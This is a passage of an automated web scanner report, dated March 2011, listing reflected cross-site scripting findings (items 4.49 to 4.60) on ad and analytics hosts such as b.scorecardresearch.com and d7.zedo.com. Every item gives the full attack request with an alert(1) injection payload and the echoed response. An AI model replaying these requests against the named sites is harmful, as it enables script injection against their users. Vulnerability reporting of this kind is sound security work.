<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head></head>
<body style="margin:0; padding:0;">
<!--
Server parameter value is not supported: m1f60d--><script>alert(1)</script>0d94a310df2
AdServer: app04
-->
...[SNIP]...

4.49. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload a2ace<script>alert(1)</script>2df88929d80 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=a2ace<script>alert(1)</script>2df88929d80&source=js&ord=1247160529 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/abmOQK1UJ90aynSr3HUrB0WtFUmb7rRUvrYqQt3TZbh4qrYmEMAYbjbUHfVoPfJmGnooWvJ3EMf3tes3A7ZdmFUZcYcrTYGZbV0cfNpTF42bQRTFfZcWAYWQTb2SsQMQdZbxYt7qVP3u2GB3XbBIU6qr5mUeRmfF3tBMXHJJmdAo3938fIhilL/2448066/adTag.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sun, 20 Mar 2011 17:25:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSa2ace%3Cscript%3Ealert%281%29%3C%2Fscript%3E2df88929d800=uid=9248110; expires=Mon, 21-Mar-2011 17:26:08 GMT; path=/
Set-Cookie: FSa2ace%3Cscript%3Ealert%281%29%3C%2Fscript%3E2df88929d80=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4096&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Wed, 20-Apr-2011 17:26:08 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 20 Mar 2011 17:26:07 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=a2ace<script>alert(1)</script>2df88929d80.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

4.50. http://assets.truvie.com/button.js [partner_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.truvie.com
Path:   /button.js

Issue detail

The value of the partner_key request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ba'%3balert(1)//5a0c330758a was submitted in the partner_key parameter. This input was echoed as 457ba';alert(1)//5a0c330758a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /button.js?partner_key=04e77fc8cc74396e5f52b887dd10171a457ba'%3balert(1)//5a0c330758a&token=quova13006323844d861340674da HTTP/1.1
Host: assets.truvie.com
Proxy-Connection: keep-alive
Referer: http://www.quova.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:48 GMT
Server: Apache/2.2.16 (Fedora)
Connection: close
Content-Type: text/javascript
Content-Length: 7278

/*global document, window, escape */
var agt = window.navigator.userAgent.toLowerCase();
var opera = agt.indexOf('opera') !== -1;
var ie = agt.indexOf('msie') !== -1;
var ns = window.navigator.app
...[SNIP]...
<param name="movie" value="http://04e77fc8cc74396e5f52b887dd10171a457ba';alert(1)//5a0c330758a-quova13006323844d861340674da.assets.truvie.com/movie.swf?q=partner_key%3D04e77fc8cc74396e5f52b887dd10171a457ba%2527%253Balert%25281%2529%252F%252F5a0c330758a%26token%3Dquova13006323844d861340674da&por
...[SNIP]...

4.51. http://assets.truvie.com/button.js [token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.truvie.com
Path:   /button.js

Issue detail

The value of the token request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dbd'%3balert(1)//5b2336207c5 was submitted in the token parameter. This input was echoed as 13dbd';alert(1)//5b2336207c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /button.js?partner_key=04e77fc8cc74396e5f52b887dd10171a&token=quova13006323844d861340674da13dbd'%3balert(1)//5b2336207c5 HTTP/1.1
Host: assets.truvie.com
Proxy-Connection: keep-alive
Referer: http://www.quova.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:49 GMT
Server: Apache/2.2.16 (Fedora)
Connection: close
Content-Type: text/javascript
Content-Length: 7246

/*global document, window, escape */
var agt = window.navigator.userAgent.toLowerCase();
var opera = agt.indexOf('opera') !== -1;
var ie = agt.indexOf('msie') !== -1;
var ns = window.navigator.app
...[SNIP]...
<param name="movie" value="http://04e77fc8cc74396e5f52b887dd10171a-quova13006323844d861340674da13dbd';alert(1)//5b2336207c5.assets.truvie.com/movie.swf?q=partner_key%3D04e77fc8cc74396e5f52b887dd10171a%26token%3Dquova13006323844d861340674da13dbd%2527%253Balert%25281%2529%252F%252F5b2336207c5&port=443&host=04e77fc8cc74396e5f
...[SNIP]...

4.52. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a04ba<script>alert(1)</script>d250a5589a3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3a04ba<script>alert(1)</script>d250a5589a3&c2=6035155&c3=5119479&c4=41005094&c5=57956784&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 17:26:42 GMT
Date: Sun, 20 Mar 2011 17:26:42 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3a04ba<script>alert(1)</script>d250a5589a3", c2:"6035155", c3:"5119479", c4:"41005094", c5:"57956784", c6:"", c10:"", c15:"", c16:"", r:""});

4.53. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3a577<script>alert(1)</script>f0467ef660e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=60351553a577<script>alert(1)</script>f0467ef660e&c3=5119479&c4=41005094&c5=57956784&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 17:26:42 GMT
Date: Sun, 20 Mar 2011 17:26:42 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"60351553a577<script>alert(1)</script>f0467ef660e", c3:"5119479", c4:"41005094", c5:"57956784", c6:"", c10:"", c15:"", c16:"", r:""});

4.54. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload b855a<script>alert(1)</script>1d3b5ae5845 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035155&c3=5119479b855a<script>alert(1)</script>1d3b5ae5845&c4=41005094&c5=57956784&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 17:26:42 GMT
Date: Sun, 20 Mar 2011 17:26:42 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035155", c3:"5119479b855a<script>alert(1)</script>1d3b5ae5845", c4:"41005094", c5:"57956784", c6:"", c10:"", c15:"", c16:"", r:""});

4.55. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ae805<script>alert(1)</script>db104d8ffcd was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094ae805<script>alert(1)</script>db104d8ffcd&c5=57956784&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 17:26:42 GMT
Date: Sun, 20 Mar 2011 17:26:42 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035155", c3:"5119479", c4:"41005094ae805<script>alert(1)</script>db104d8ffcd", c5:"57956784", c6:"", c10:"", c15:"", c16:"", r:""});

4.56. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 40c75<script>alert(1)</script>d0c790edaba was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094&c5=5795678440c75<script>alert(1)</script>d0c790edaba&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 17:26:42 GMT
Date: Sun, 20 Mar 2011 17:26:42 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035155", c3:"5119479", c4:"41005094", c5:"5795678440c75<script>alert(1)</script>d0c790edaba", c6:"", c10:"", c15:"", c16:"", r:""});

4.57. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 241f7<script>alert(1)</script>0ecb1669f4b was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094&c5=57956784&c6=241f7<script>alert(1)</script>0ecb1669f4b& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 17:26:42 GMT
Date: Sun, 20 Mar 2011 17:26:42 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035155", c3:"5119479", c4:"41005094", c5:"57956784", c6:"241f7<script>alert(1)</script>0ecb1669f4b", c10:"", c15:"", c16:"", r:""});

4.58. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 214c7'%3balert(1)//3be38b6ab7b was submitted in the $ parameter. This input was echoed as 214c7';alert(1)//3be38b6ab7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=214c7'%3balert(1)//3be38b6ab7b&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1219:214c7';alert(1)//3be38b6ab7b;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:41 GMT
Connection: close
Content-Length: 895

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',214c7';alert(1)//3be38b6ab7b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,214c7';alert(1)//3be38b6ab7b;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasA
...[SNIP]...

4.59. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6583d"%3balert(1)//b046b0d6fdc was submitted in the $ parameter. This input was echoed as 6583d";alert(1)//b046b0d6fdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=6583d"%3balert(1)//b046b0d6fdc&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1219:6583d";alert(1)//b046b0d6fdc;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:40 GMT
Connection: close
Content-Length: 895

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',6583d";alert(1)//b046b0d6fdc';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,6583d";alert(1)//b046b0d6fdc;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasAd=undefined;


                   var zzpixie = new Image();
var zzRandom = Math.random();
va
...[SNIP]...

4.60. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5abb7"%3balert(1)//4ceb5a9102f was submitted in the q parameter. This input was echoed as 5abb7";alert(1)//4ceb5a9102f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=5abb7"%3balert(1)//4ceb5a9102f&$=&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
